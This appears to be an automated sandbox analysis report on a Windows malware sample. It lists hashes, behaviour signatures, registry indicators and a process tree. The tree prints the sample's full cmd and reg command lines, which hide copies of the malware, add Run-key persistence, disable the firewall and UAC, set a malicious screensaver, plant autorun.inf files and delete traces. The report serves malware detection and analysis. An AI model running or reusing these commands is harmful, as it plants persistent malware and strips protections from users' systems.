Analysis
max time kernel: 140s
max time network: 133s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10/08/2024, 05:34
Behavioral task behavioral1
Sample: 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Resource: win7-20240704-en
Behavioral task behavioral2
Sample: 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Resource: win10v2004-20240802-en
General
Target: 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Size: 273KB
MD5: 84f755ce53cb1d70ba895c0f0f629595
SHA1: 3fdf3e27b1541d52c9a865951a2bdee107c37473
SHA256: 5f9f5634db8e30d9d11a63baa794863ecf4855637f95e81b6fe667d9f85cab72
SHA512: cd2cee1a1a8e4b53118b1a463fcf767a3fc72566663d16f5cbc563d79f2b9c47e4c1a60dbbd4c61faebcc1488a842783f9984433e2d52c2b5148918d3fb99de7
SSDEEP: 6144:/BNw2vyd8KCg4pI4UJr22Ssdk/JplhD/zntJCkTSwKUxSwc:TwQyfdXCpj7nBNxS
Malware Config
Signatures
Modifies firewall policy service 3 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | reg.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Modifies Windows Firewall 2 TTPs 4 IoCs
pid | Process
3652 | netsh.exe
4164 | netsh.exe
1448 | netsh.exe
4440 | netsh.exe
Sets file to hidden 1 TTPs 10 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid | Process
3680 | attrib.exe
4608 | attrib.exe
4696 | attrib.exe
1724 | attrib.exe
636 | attrib.exe
2548 | attrib.exe
4540 | attrib.exe
2368 | attrib.exe
2732 | attrib.exe
532 | attrib.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Loads dropped DLL 3 IoCs
pid | Process
3852 | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
516 | IEXPLORE.EXE
548 | IEXPLORE.EXE
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource | yara_rule
behavioral2/memory/4036-0-0x00000000001B0000-0x0000000000203000-memory.dmp | upx
behavioral2/memory/4036-8-0x00000000001B0000-0x0000000000203000-memory.dmp | upx
behavioral2/files/0x000f0000000233f7-14.dat | upx
behavioral2/memory/3852-24-0x00000000001B0000-0x0000000000203000-memory.dmp | upx
behavioral2/memory/4036-223-0x00000000001B0000-0x0000000000203000-memory.dmp | upx
behavioral2/memory/3852-449-0x00000000001B0000-0x0000000000203000-memory.dmp | upx
Adds Run key to start application 2 TTPs 8 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\System32\\sysrunc.exe" | IEXPLORE.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\system32\\sysrunc.exe" | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe" | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\System32\\sysrunc.exe" | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\system32\\sysrunc.exe" | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe" | IEXPLORE.EXE
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description | ioc | Process
File opened for modification | F:\autorun.inf | attrib.exe
File created | F:\autorun.inf | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
File created | C:\autorun.inf | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
File created | D:\autorun.inf | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
File opened for modification | C:\autorun.inf | attrib.exe
Drops file in System32 directory 6 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\sysrunc.exe | cmd.exe
File opened for modification | C:\Windows\SysWOW64\sysrunc.exe | cmd.exe
File opened for modification | C:\Windows\SysWOW64\sysrunc.exe | attrib.exe
File opened for modification | C:\Windows\SysWOW64\sysrunc.exe | attrib.exe
File opened for modification | C:\Windows\SysWOW64\sysrunc.exe | cmd.exe
File opened for modification | C:\Windows\SysWOW64\sysrunc.exe | attrib.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Launches sc.exe 6 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
4444 | sc.exe
4680 | sc.exe
3388 | sc.exe
728 | sc.exe
4236 | sc.exe
3152 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Modifies Control Panel 4 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\ScreenSaveActive = "1" | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\ScreenSaveTimeOut = "60" | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\ScreenSaveActive = "1" | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\ScreenSaveTimeOut = "60" | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Modifies registry class 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid | Process
4036 | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
3852 | 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Suspicious use of FindShellTrayWindow 2 IoCs
pid | Process
3908 | iexplore.exe
3908 | iexplore.exe
Suspicious use of SetWindowsHookEx 12 IoCs
pid | Process
3908 | iexplore.exe
3908 | iexplore.exe
516 | IEXPLORE.EXE
516 | IEXPLORE.EXE
516 | IEXPLORE.EXE
516 | IEXPLORE.EXE
3908 | iexplore.exe
3908 | iexplore.exe
548 | IEXPLORE.EXE
548 | IEXPLORE.EXE
548 | IEXPLORE.EXE
548 | IEXPLORE.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Views/modifies file attributes 1 TTPs 20 IoCs
pid Process
1596 attrib.exe
2732 attrib.exe
1724 attrib.exe
2368 attrib.exe
4696 attrib.exe
3996 attrib.exe
3488 attrib.exe
532 attrib.exe
3388 attrib.exe
448 attrib.exe
4540 attrib.exe
4008 attrib.exe
4608 attrib.exe
4764 attrib.exe
636 attrib.exe
3680 attrib.exe
3104 attrib.exe
2548 attrib.exe
1164 attrib.exe
3288 attrib.exe
Processes
(Process tree. Indentation shows parent/child nesting; each entry reads: image path | command line | PID. Signatures flagged for a process are listed beneath it.)

C:\Windows\system32\sihost.exe | sihost.exe | PID:2648
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | PID:2656
C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} | PID:2808
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc | PID:3636
C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | PID:3836
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca | PID:3924
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | PID:3988
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca | PID:4072
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | PID:3608
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe | "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca | PID:1320
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | PID:4168
C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe | "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" | PID:4036
  - Checks computer location settings
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Modifies Control Panel
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib -R -H "%appdata%\daemon.exe" | PID:3536
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\attrib.exe | attrib -R -H "C:\Users\Admin\AppData\Roaming\daemon.exe" | PID:3996
      - System Location Discovery: System Language Discovery
      - Views/modifies file attributes
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib -R -H "%windir%\system32sysrunc.exe" | PID:4488
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\attrib.exe | attrib -R -H "C:\Windows\system32sysrunc.exe" | PID:1596
      - System Location Discovery: System Language Discovery
      - Views/modifies file attributes
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c rename "%appdata%\daemon.exe" "trash1.dat" | PID:2316
    - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c rename "%windir%\system32\sysrunc.exe" "trash2.dat" | PID:4964
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f | PID:3972
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f | PID:1412
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f | PID:3236
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\reg.exe | reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f | PID:4896
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\plugininstall.bat" | PID:2332
    - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software" /v "crc32" /t REG_SZ /d "Pxhnjpa4" /f | PID:5104
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKCU\software" /v "crc32" /t REG_SZ /d "Pxhnjpa4" /f | PID:3868
      - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c del "%appdata%\trash1.dat" | PID:864
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c del "%windir%\system32\trash2.dat" | PID:4428
    - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c del /s /f "%appdata%\trash1.dat" | PID:3744
    - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c del /s /f "%windir%\system32\trash2.dat" | PID:3368
    - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\daemon.exe" | PID:4760
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\attrib.exe | attrib -R -H -S "C:\Users\Admin\AppData\Roaming\daemon.exe" | PID:4008
      - Views/modifies file attributes
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%appdata%\daemon.exe" | PID:2996
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\daemon.exe" | PID:1504
    C:\Windows\SysWOW64\attrib.exe | attrib +R +H +S "C:\Users\Admin\AppData\Roaming\daemon.exe" | PID:636
      - Sets file to hidden
      - Views/modifies file attributes
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "%appdata%\daemon.exe" /f | PID:856
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\daemon.exe" /f | PID:2044
      - Adds Run key to start application
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\sysrunc.exe" | PID:4772
    C:\Windows\SysWOW64\attrib.exe | attrib -R -H -S "C:\Windows\system32\sysrunc.exe" | PID:3488
      - Views/modifies file attributes
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%windir%\system32\sysrunc.exe" | PID:3748
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\sysrunc.exe" | PID:4416
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\attrib.exe | attrib +R +H +S "C:\Windows\system32\sysrunc.exe" | PID:532
      - Sets file to hidden
      - Drops file in System32 directory
      - Views/modifies file attributes
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "%windir%\system32\sysrunc.exe" /f | PID:2340
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "C:\Windows\system32\sysrunc.exe" /f | PID:3772
      - Adds Run key to start application
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows | PID:4540
    - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\3dtext.scr" | PID:780
    C:\Windows\SysWOW64\attrib.exe | attrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr" | PID:3388
      - Views/modifies file attributes
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%appdata%\Microsoft\Windows\3dtext.scr" | PID:1120
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\3dtext.scr" | PID:3944
    C:\Windows\SysWOW64\attrib.exe | attrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr" | PID:3680
      - Sets file to hidden
      - Views/modifies file attributes
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\3dtext.scr" /f | PID:2668
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr" /f | PID:1192
      - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f | PID:940
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f | PID:2564
  C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f | PID:1420
    C:\Windows\SysWOW64\reg.exe | reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f | PID:1676
      - System Location Discovery: System Language Discovery
  C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe | "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" | PID:3852
    - Checks computer location settings
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops autorun.inf file
    - Modifies Control Panel
    - Suspicious behavior: GetForegroundWindowSpam
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c del "%appdata%\trash1.dat" | PID:916
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c del "%windir%\system32\trash2.dat" | PID:1616
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c del /s /f "%appdata%\trash1.dat" | PID:4000
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c del /s /f "%windir%\system32\trash2.dat" | PID:4152
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\daemon.exe" | PID:856
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\attrib.exe | attrib -R -H -S "C:\Users\Admin\AppData\Roaming\daemon.exe" | PID:3104
        - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%appdata%\daemon.exe" | PID:728
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\daemon.exe" | PID:2388
      C:\Windows\SysWOW64\attrib.exe | attrib +R +H +S "C:\Users\Admin\AppData\Roaming\daemon.exe" | PID:2548
        - Sets file to hidden
        - System Location Discovery: System Language Discovery
        - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "%appdata%\daemon.exe" /f | PID:652
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\daemon.exe" /f | PID:2912
        - Adds Run key to start application
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\sysrunc.exe" | PID:1176
      C:\Windows\SysWOW64\attrib.exe | attrib -R -H -S "C:\Windows\system32\sysrunc.exe" | PID:448
        - Drops file in System32 directory
        - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%windir%\system32\sysrunc.exe" | PID:668
      - Drops file in System32 directory
      - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\sysrunc.exe" | PID:2148
      C:\Windows\SysWOW64\attrib.exe | attrib +R +H +S "C:\Windows\system32\sysrunc.exe" | PID:4540
        - Sets file to hidden
        - Drops file in System32 directory
        - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "%windir%\system32\sysrunc.exe" /f | PID:1684
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "C:\Windows\system32\sysrunc.exe" /f | PID:3568
        - Adds Run key to start application
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows | PID:1948
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\3dtext.scr" | PID:1892
      C:\Windows\SysWOW64\attrib.exe | attrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr" | PID:1164
        - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe" "%appdata%\Microsoft\Windows\3dtext.scr" | PID:3436
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\3dtext.scr" | PID:2712
      C:\Windows\SysWOW64\attrib.exe | attrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr" | PID:2368
        - Sets file to hidden
        - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\3dtext.scr" /f | PID:3632
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr" /f | PID:4476
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f | PID:1668
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f | PID:3700
        - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f | PID:1200
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f | PID:4160
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c rd /s /q "%appdata%\Macromedia\Flash Player\#SharedObjects" | PID:4056
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f | PID:4708
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\reg.exe | reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f | PID:3748
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib +R +H "F:\autorun.inf" | PID:2000
      C:\Windows\SysWOW64\attrib.exe | attrib +R +H "F:\autorun.inf" | PID:4696
        - Sets file to hidden
        - Drops autorun.inf file
        - System Location Discovery: System Language Discovery
        - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c attrib +R +H "C:\autorun.inf" | PID:388
      C:\Windows\SysWOW64\attrib.exe | attrib +R +H "C:\autorun.inf" | PID:4608
        - Sets file to hidden
        - Drops autorun.inf file
        - System Location Discovery: System Language Discovery
        - Views/modifies file attributes
    C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f | PID:1412
      C:\Windows\SysWOW64\reg.exe | reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f | PID:2252
